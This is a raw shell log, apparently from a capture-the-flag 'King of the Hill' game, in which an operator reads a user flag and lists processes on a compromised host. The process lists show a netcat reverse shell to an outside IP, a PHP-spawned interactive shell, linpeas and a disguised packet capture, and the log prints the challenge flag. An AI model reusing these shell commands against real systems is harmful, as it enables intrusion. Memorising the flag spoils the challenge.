echo bNdmwJWImq0
bNdmwJWImq0

ls
bash
btrfs
btrfs-calc-size
btrfs-convert
btrfs-debug-tree
btrfs-find-root
btrfs-image
btrfs-map-logical
btrfs-select-super
btrfs-show-super
btrfs-zero-log
btrfsck
btrfstune
bunzip2
busybox
bzcat
bzcmp
bzdiff
bzegrep
bzexe
bzfgrep
bzgrep
bzip2
bzip2recover
bzless
bzmore
cat
chacl
chgrp
chmod
chown
chvt
cp
cpio
dash
date
dd
df
dir
dmesg
dnsdomainname
domainname
dumpkeys
echo
ed
egrep
false
fgconsole
fgrep
findmnt
fsck.btrfs
fuser
fusermount
getfacl
grep
gunzip
gzexe
gzip
hostname
ip
journalctl
kbd_mode
kill
kmod
less
lessecho
lessfile
lesskey
lesspipe
ln
loadkeys
login
loginctl
lowntfs-3g
ls
lsblk
lsmod
mkdir
mkfs.btrfs
mknod
mktemp
more
mount
mountpoint
mt
mt-gnu
mv
nano
nc
nc.openbsd
netcat
netstat
networkctl
nisdomainname
ntfs-3g
ntfs-3g.probe
ntfs-3g.secaudit
ntfs-3g.usermap
ntfscat
ntfscluster
ntfscmp
ntfsfallocate
ntfsfix
ntfsinfo
ntfsls
ntfsmove
ntfstruncate
ntfswipe
open
openvt
pidof
ping
ping6
plymouth
ps
pwd
rbash
readlink
red
rm
rmdir
rnano
run-parts
sed
setfacl
setfont
setupcon
sh
sh.distrib
sleep
ss
static-sh
stty
su
sync
systemctl
systemd
systemd-ask-password
systemd-escape
systemd-hwdb
systemd-inhibit
systemd-machine-id-setup
systemd-notify
systemd-tmpfiles
systemd-tty-ask-password-agent
tailf
tar
tempfile
touch
true
udevadm
ulockmgr_server
umount
uname
uncompress
unicode_start
vdir
wdctl
which
whiptail
ypdomainname
zcat
zcmp
zdiff
zegrep
zfgrep
zforce
zgrep
zless
zmore
znew
cd /home/gloria
ls
user.txt
cat user.txt
thm{05e2762150425df49a2d27e8bb08cf2d}
ls /hoemmmm
ls: cannot access '/hoemmmm': No such file or directory
ls /hooooooooooome
ls: cannot access '/hooooooooooome': No such file or directory
ls /home
alex
gloria
marty
ls /home/martyyyyyyyyyy
ls: cannot access '/home/martyyyyyyyyyy': No such file or directory
ls -lisa
total 36
406255 4 drwxr-xr-x 5 gloria gloria 4096 Oct  4 18:36 .
393344 4 drwxr-xr-x 5 root   root   4096 May  1  2020 ..
407716 0 lrwxrwxrwx 1 root   root      9 May  2  2020 .bash_history -> /dev/null
406256 4 -rw-r--r-- 1 gloria gloria  220 May  1  2020 .bash_logout
406257 4 -rw-r--r-- 1 gloria gloria 3771 May  1  2020 .bashrc
393819 4 drwx------ 2 gloria gloria 4096 Oct  4 18:17 .cache
405641 4 drwxr-x--- 3 gloria gloria 4096 Oct  4 18:36 .config
406258 4 -rw-r--r-- 1 gloria gloria  655 May  1  2020 .profile
406038 4 drwx------ 2 gloria gloria 4096 May  3  2020 .ssh
408394 4 -r-------- 1 gloria gloria   38 May  2  2020 user.txt
ps -efH
UID        PID  PPID  C STIME TTY          TIME CMD
root         2     0  0 18:02 ?        00:00:00 [kthreadd]
root         3     2  0 18:02 ?        00:00:05   [ksoftirqd/0]
root         5     2  0 18:02 ?        00:00:00   [kworker/0:0H]
root         6     2  0 18:02 ?        00:00:00   [kworker/u30:0]
root         7     2  0 18:02 ?        00:00:01   [rcu_sched]
root         8     2  0 18:02 ?        00:00:00   [rcu_bh]
root         9     2  0 18:02 ?        00:00:00   [migration/0]
root        10     2  0 18:02 ?        00:00:00   [watchdog/0]
root        11     2  0 18:02 ?        00:00:00   [kdevtmpfs]
root        12     2  0 18:02 ?        00:00:00   [netns]
root        13     2  0 18:02 ?        00:00:00   [perf]
root        14     2  0 18:02 ?        00:00:00   [xenwatch]
root        15     2  0 18:02 ?        00:00:00   [xenbus]
root        17     2  0 18:02 ?        00:00:00   [khungtaskd]
root        18     2  0 18:02 ?        00:00:00   [writeback]
root        19     2  0 18:02 ?        00:00:00   [ksmd]
root        20     2  0 18:02 ?        00:00:00   [khugepaged]
root        21     2  0 18:02 ?        00:00:00   [crypto]
root        22     2  0 18:02 ?        00:00:00   [kintegrityd]
root        23     2  0 18:02 ?        00:00:00   [bioset]
root        24     2  0 18:02 ?        00:00:00   [kblockd]
root        25     2  0 18:02 ?        00:00:00   [ata_sff]
root        26     2  0 18:02 ?        00:00:00   [md]
root        27     2  0 18:02 ?        00:00:00   [devfreq_wq]
root        30     2  0 18:02 ?        00:00:11   [kswapd0]
root        31     2  0 18:02 ?        00:00:00   [vmstat]
root        32     2  0 18:02 ?        00:00:00   [fsnotify_mark]
root        33     2  0 18:02 ?        00:00:00   [ecryptfs-kthrea]
root        49     2  0 18:02 ?        00:00:00   [kthrotld]
root        50     2  0 18:02 ?        00:00:00   [acpi_thermal_pm]
root        51     2  0 18:02 ?        00:00:00   [bioset]
root        52     2  0 18:02 ?        00:00:00   [bioset]
root        53     2  0 18:02 ?        00:00:00   [bioset]
root        54     2  0 18:02 ?        00:00:00   [bioset]
root        55     2  0 18:02 ?        00:00:00   [bioset]
root        56     2  0 18:02 ?        00:00:00   [bioset]
root        57     2  0 18:02 ?        00:00:00   [bioset]
root        58     2  0 18:02 ?        00:00:00   [bioset]
root        59     2  0 18:02 ?        00:00:00   [scsi_eh_0]
root        60     2  0 18:02 ?        00:00:00   [scsi_tmf_0]
root        61     2  0 18:02 ?        00:00:00   [scsi_eh_1]
root        62     2  0 18:02 ?        00:00:00   [scsi_tmf_1]
root        64     2  0 18:02 ?        00:00:00   [bioset]
root        66     2  0 18:02 ?        00:00:00   [bioset]
root        70     2  0 18:02 ?        00:00:00   [ipv6_addrconf]
root        83     2  0 18:02 ?        00:00:00   [deferwq]
root        84     2  0 18:02 ?        00:00:00   [charger_manager]
root       124     2  0 18:02 ?        00:00:00   [bioset]
root       125     2  0 18:02 ?        00:00:00   [bioset]
root       126     2  0 18:02 ?        00:00:00   [bioset]
root       127     2  0 18:02 ?        00:00:00   [bioset]
root       128     2  0 18:02 ?        00:00:00   [bioset]
root       129     2  0 18:02 ?        00:00:00   [bioset]
root       130     2  0 18:02 ?        00:00:00   [bioset]
root       131     2  0 18:02 ?        00:00:00   [bioset]
root       132     2  0 18:02 ?        00:00:00   [kpsmoused]
root       147     2  0 18:02 ?        00:00:00   [ttm_swap]
root       233     2  0 18:02 ?        00:00:00   [raid5wq]
root       265     2  0 18:02 ?        00:00:00   [bioset]
root       291     2  0 18:02 ?        00:00:00   [jbd2/xvda1-8]
root       292     2  0 18:02 ?        00:00:00   [ext4-rsv-conver]
root       333     2  0 18:02 ?        00:00:00   [kworker/0:1H]
root       364     2  0 18:02 ?        00:00:00   [iscsi_eh]
root       366     2  0 18:02 ?        00:00:00   [ib_addr]
root       368     2  0 18:02 ?        00:00:00   [ib_mcast]
root       369     2  0 18:02 ?        00:00:00   [ib_nl_sa_wq]
root       370     2  0 18:02 ?        00:00:00   [ib_cm]
root       371     2  0 18:02 ?        00:00:00   [iw_cm_wq]
root       372     2  0 18:02 ?        00:00:00   [rdma_cm]
root       373     2  0 18:02 ?        00:00:00   [kauditd]
root      2293     2  0 18:17 ?        00:00:00   [kworker/0:3]
root      2822     2  0 18:22 ?        00:00:00   [kworker/u30:2]
root      2889     2  0 18:23 ?        00:00:00   [kworker/0:0]
root      3942     2  0 18:33 ?        00:00:00   [kworker/u30:1]
root         1     0  0 18:02 ?        00:00:05 /sbin/init
root       362     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-journald
root       399     1  0 18:02 ?        00:00:00   /sbin/lvmetad -f
root       414     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-udevd
systemd+   500     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-timesyncd
root       704     1  0 18:02 ?        00:00:00   /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       886     1  0 18:02 ?        00:00:00   /usr/sbin/sshd -D
root      2611   886  0 18:19 ?        00:00:00     sshd: gloria [priv]
gloria    2664  2611  0 18:19 ?        00:00:00       sshd: gloria@pts/3
gloria    2667  2664  0 18:19 pts/3    00:00:00         -bash
root      2830   886  0 18:23 ?        00:00:00     sshd: gloria [priv]
gloria    2862  2830  0 18:23 ?        00:00:00       sshd: gloria@pts/1
gloria    2863  2862  0 18:23 pts/1    00:00:00         -bash
gloria    3155  2863  0 18:26 pts/1    00:00:00           /bin/sh ./linpeas.sh
gloria    8294  3155  0 18:36 pts/1    00:00:00             /bin/sh ./linpeas.sh
gloria    8295  8294 49 18:36 pts/1    00:00:33               lxc list -c n --format csv
gloria    8296  8294  0 18:36 pts/1    00:00:00               wc -l
root      3475   886  0 18:28 ?        00:00:00     sshd: gloria [priv]
gloria    3518  3475  0 18:28 ?        00:00:00       sshd: gloria@pts/5
gloria    3519  3518  0 18:28 pts/5    00:00:00         -bash
gloria    7471  3519  0 18:36 pts/5    00:00:00           tmux -S /.dev/session
root      3662   886  0 18:29 ?        00:00:00     sshd: rsyslogd@notty
root      3699  3662  0 18:29 ?        00:00:00       sh -c /bin/sh
root      3700  3699  0 18:29 ?        00:00:00         /bin/sh
root      3788  3700  0 18:30 ?        00:00:00           tcpdump -i any -w /tmp/.systmd-private-c8egwc932h89fh3298
root      4051   886  0 18:33 ?        00:00:00     sshd: gloria [priv]
gloria    4094  4051  0 18:34 ?        00:00:00       sshd: gloria@pts/7
gloria    4095  4094  0 18:34 pts/7    00:00:00         -bash
gloria    4170  4095  0 18:35 pts/7    00:00:00           /usr/bin/tmux -S /.dev/session
root       889     1  0 18:02 ?        00:00:00   /usr/sbin/cron -f
root      8379   889  0 18:37 ?        00:00:00     /usr/sbin/CRON -f
root      8380  8379  0 18:37 ?        00:00:00       /bin/sh -c /usr/bin/find / -name "chattr" -exec rm -rf {} \;
root      8381  8380  5 18:37 ?        00:00:02         /usr/bin/find / -name chattr -exec rm -rf {} ;
root       894     1  0 18:02 ?        00:00:00   /usr/sbin/acpid
root       897     1  0 18:02 ?        00:00:00   /usr/lib/accountsservice/accounts-daemon
daemon     900     1  0 18:02 ?        00:00:00   /usr/sbin/atd -f
root       910     1  0 18:02 ?        00:00:00   /root/koth
gloria     930     1  0 18:02 ?        00:00:18   /usr/local/sbin/nhttpd
gloria    8442   930  0 18:37 ?        00:00:00     /usr/local/sbin/nhttpd
gloria    8443  8442  0 18:37 ?        00:00:00       sh
gloria    8444  8443  0 18:37 ?        00:00:00         nc -lvnp 42069
root       938     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-logind
root       940     1  3 18:02 ?        00:01:20   /usr/bin/lxcfs /var/lib/lxcfs/
message+   947     1  0 18:02 ?        00:00:00   /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
syslog     951     1  0 18:02 ?        00:00:00   /usr/sbin/rsyslogd -n
root       977     1  0 18:02 ?        00:00:00   /usr/lib/snapd/snapd
root       990     1  0 18:02 ?        00:00:00   /sbin/iscsid
root       991     1  0 18:02 ?        00:00:00   /sbin/iscsid
mysql      996     1  0 18:02 ?        00:00:01   /usr/sbin/mysqld
root      1008     1  0 18:02 ?        00:00:00   php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
gloria    1028  1008  0 18:02 ?        00:00:01     php-fpm: pool www
gloria    4041  1028  0 18:33 ?        00:00:00       sh -c uname -a; w; id; /bin/sh -i
gloria    4045  4041  0 18:33 ?        00:00:00         /bin/sh -i
gloria    1029  1008  0 18:02 ?        00:00:00     php-fpm: pool www
gloria    5621  1008  0 18:35 ?        00:00:00     php-fpm: pool www
root      1019     1  0 18:02 ?        00:00:00   /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1025     1  0 18:02 ?        00:00:00   nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data  1026  1025  0 18:02 ?        00:00:05     nginx: worker process
root      1030     1  0 18:02 ?        00:00:00   /usr/lib/policykit-1/polkitd --no-debug
root      1129     1  0 18:02 ttyS0    00:00:00   /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root      1137     1  0 18:02 tty1     00:00:00   /sbin/agetty --noclear tty1 linux
root      1159     1  0 18:02 ?        00:00:03   /usr/sbin/apache2 -k start
alex      1273  1159  0 18:03 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1307  1159  0 18:04 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1315  1159  0 18:04 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1376  1159  0 18:06 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1391  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1394  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1396  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1404  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1406  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1408  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1413  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1414  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1420  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1423  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1430  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1432  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1438  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1448  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1450  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1451  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1460  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1461  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1466  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1475  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1479  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1480  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1488  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1495  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1503  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1506  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1507  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      1514  1159  0 18:07 ?        00:00:04     /usr/sbin/apache2 -k start
alex      1516  1159  0 18:07 ?        00:00:03     /usr/sbin/apache2 -k start
alex      2109  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2117  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2118  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2120  1159  0 18:16 ?        00:00:03     /usr/sbin/apache2 -k start
alex      2121  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2122  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2123  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2125  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2126  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2127  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2128  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2129  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2130  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2131  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2132  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2133  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2134  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2135  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2136  1159  0 18:16 ?        00:00:01     /usr/sbin/apache2 -k start
alex      2137  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2138  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2139  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2141  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2143  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2144  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2145  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2146  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2147  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2148  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2149  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2150  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2151  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2152  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2153  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2154  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2155  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2156  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2157  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2158  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2159  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2160  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2162  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2163  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2164  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2165  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2166  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2167  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2168  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2169  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2170  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2172  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2181  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2199  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2200  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2203  1159  0 18:16 ?        00:00:01     /usr/sbin/apache2 -k start
alex      2207  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2208  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2209  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2212  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2214  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2215  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2216  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2218  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2219  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2228  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2229  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2231  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2232  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2233  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2234  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2235  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2241  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2242  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2243  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2247  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2248  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2249  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2250  1159  0 18:17 ?        00:00:01     /usr/sbin/apache2 -k start
alex      2251  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2253  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2254  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2255  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2260  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2261  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2262  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2263  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2264  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2265  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2266  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2267  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2268  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2269  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2325  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2346  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2356  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2358  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2390  1159  0 18:17 ?        00:00:01     /usr/sbin/apache2 -k start
alex      2410  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2411  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2412  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2413  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2414  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2434  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2437  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2438  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2439  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2440  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2441  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2442  1159  0 18:17 ?        00:00:02     [apache2] <defunct>
root      1223     1  0 18:02 ?        00:00:00   /usr/bin/tmux -S /.dev/session new-session -d
root      1224  1223  0 18:02 pts/0    00:00:00     -sh
root      3742  1223  0 18:30 pts/6    00:00:00     -sh
root      3885  1223  0 18:32 pts/4    00:00:00     -sh
root      3954  1223  0 18:33 pts/8    00:00:00     -sh
root      4061  1223  0 18:33 pts/2    00:00:00     -sh
root      4171  1223  0 18:35 pts/9    00:00:00     -sh
root      7164  4171  0 18:36 pts/9    00:00:00       bash
root      7476  1223  0 18:36 pts/10   00:00:00     -sh
gloria    1650     1  0 18:09 ?        00:00:00   bash
gloria    1651  1650  0 18:09 ?        00:00:00     bash -i
gloria    1693     1  0 18:10 ?        00:00:00   systemd-pam
root      2073     1 14 18:15 pts/0    00:03:18   bash -i
root      2180     1 10 18:16 pts/0    00:02:19   bash -i
root      2420     1  0 18:17 pts/0    00:00:01   systemd-pam
gloria    2617     1  0 18:19 ?        00:00:00   /lib/systemd/systemd --user
gloria    2621  2617  0 18:19 ?        00:00:00     (sd-pam)
gloria    3063     1  6 18:25 ?        00:00:46   /usr/bin/python3 -
gloria    3123  3063  0 18:26 ?        00:00:00     [sh] <defunct>
root      3664     1  0 18:29 ?        00:00:00   /lib/systemd/systemd --user
root      3666  3664  0 18:29 ?        00:00:00     (sd-pam)
gloria    4117     1  0 18:34 ?        00:00:00   nc -l 127.0.0.1 12345
gloria    8220     1  0 18:36 ?        00:00:00   nc 10.6.33.29 4444
gloria    8221     1  0 18:36 ?        00:00:00   /bin/sh
gloria    8491  8221  0 18:37 ?        00:00:00     ps -efH
whoami
gloria
ls -lisa /tmp
total 60028
   133     4 drwxrwxrwt  9 root   root       4096 Oct  4 18:38 .
     2     4 drwxr-xr-x 25 root   root       4096 Oct  4 18:28 ..
157704     4 drwxrwxrwt  2 root   root       4096 Oct  4 18:02 .ICE-unix
157707     4 drwxrwxrwt  2 root   root       4096 Oct  4 18:02 .Test-unix
131661     4 drwxrwxrwt  2 root   root       4096 Oct  4 18:02 .X11-unix
157705     4 drwxrwxrwt  2 root   root       4096 Oct  4 18:02 .XIM-unix
157706     4 drwxrwxrwt  2 root   root       4096 Oct  4 18:02 .font-unix
 19118 59176 -rw-r--r--  1 root   root   60596224 Oct  4 18:38 .systmd-private-c8egwc932h89fh3298
 19121     4 -rw-r--r--  1 gloria gloria       27 Oct  4 18:35 f
  1571   812 -rwxrwxr-x  1 gloria gloria   827827 Nov 30  2022 linpeas.sh
 19117     0 prw-r--r--  1 gloria gloria        0 Oct  4 18:38 smxcpe
157708     4 drwx------  3 root   root       4096 Oct  4 18:02 systemd-private-3de07fc9b2fa45b080b71eb51a3cfc74-systemd-timesyncd.service-vhiQwt
277950     4 drwx------  2 gloria gloria     4096 Oct  4 18:38 tmux-1002
cat /tmp/f
nc: Address already in use
ps -efH
UID        PID  PPID  C STIME TTY          TIME CMD
root         2     0  0 18:02 ?        00:00:00 [kthreadd]
root         3     2  0 18:02 ?        00:00:05   [ksoftirqd/0]
root         5     2  0 18:02 ?        00:00:00   [kworker/0:0H]
root         6     2  0 18:02 ?        00:00:00   [kworker/u30:0]
root         7     2  0 18:02 ?        00:00:02   [rcu_sched]
root         8     2  0 18:02 ?        00:00:00   [rcu_bh]
root         9     2  0 18:02 ?        00:00:00   [migration/0]
root        10     2  0 18:02 ?        00:00:00   [watchdog/0]
root        11     2  0 18:02 ?        00:00:00   [kdevtmpfs]
root        12     2  0 18:02 ?        00:00:00   [netns]
root        13     2  0 18:02 ?        00:00:00   [perf]
root        14     2  0 18:02 ?        00:00:00   [xenwatch]
root        15     2  0 18:02 ?        00:00:00   [xenbus]
root        17     2  0 18:02 ?        00:00:00   [khungtaskd]
root        18     2  0 18:02 ?        00:00:00   [writeback]
root        19     2  0 18:02 ?        00:00:00   [ksmd]
root        20     2  0 18:02 ?        00:00:00   [khugepaged]
root        21     2  0 18:02 ?        00:00:00   [crypto]
root        22     2  0 18:02 ?        00:00:00   [kintegrityd]
root        23     2  0 18:02 ?        00:00:00   [bioset]
root        24     2  0 18:02 ?        00:00:00   [kblockd]
root        25     2  0 18:02 ?        00:00:00   [ata_sff]
root        26     2  0 18:02 ?        00:00:00   [md]
root        27     2  0 18:02 ?        00:00:00   [devfreq_wq]
root        30     2  0 18:02 ?        00:00:11   [kswapd0]
root        31     2  0 18:02 ?        00:00:00   [vmstat]
root        32     2  0 18:02 ?        00:00:00   [fsnotify_mark]
root        33     2  0 18:02 ?        00:00:00   [ecryptfs-kthrea]
root        49     2  0 18:02 ?        00:00:00   [kthrotld]
root        50     2  0 18:02 ?        00:00:00   [acpi_thermal_pm]
root        51     2  0 18:02 ?        00:00:00   [bioset]
root        52     2  0 18:02 ?        00:00:00   [bioset]
root        53     2  0 18:02 ?        00:00:00   [bioset]
root        54     2  0 18:02 ?        00:00:00   [bioset]
root        55     2  0 18:02 ?        00:00:00   [bioset]
root        56     2  0 18:02 ?        00:00:00   [bioset]
root        57     2  0 18:02 ?        00:00:00   [bioset]
root        58     2  0 18:02 ?        00:00:00   [bioset]
root        59     2  0 18:02 ?        00:00:00   [scsi_eh_0]
root        60     2  0 18:02 ?        00:00:00   [scsi_tmf_0]
root        61     2  0 18:02 ?        00:00:00   [scsi_eh_1]
root        62     2  0 18:02 ?        00:00:00   [scsi_tmf_1]
root        64     2  0 18:02 ?        00:00:00   [bioset]
root        66     2  0 18:02 ?        00:00:00   [bioset]
root        70     2  0 18:02 ?        00:00:00   [ipv6_addrconf]
root        83     2  0 18:02 ?        00:00:00   [deferwq]
root        84     2  0 18:02 ?        00:00:00   [charger_manager]
root       124     2  0 18:02 ?        00:00:00   [bioset]
root       125     2  0 18:02 ?        00:00:00   [bioset]
root       126     2  0 18:02 ?        00:00:00   [bioset]
root       127     2  0 18:02 ?        00:00:00   [bioset]
root       128     2  0 18:02 ?        00:00:00   [bioset]
root       129     2  0 18:02 ?        00:00:00   [bioset]
root       130     2  0 18:02 ?        00:00:00   [bioset]
root       131     2  0 18:02 ?        00:00:00   [bioset]
root       132     2  0 18:02 ?        00:00:00   [kpsmoused]
root       147     2  0 18:02 ?        00:00:00   [ttm_swap]
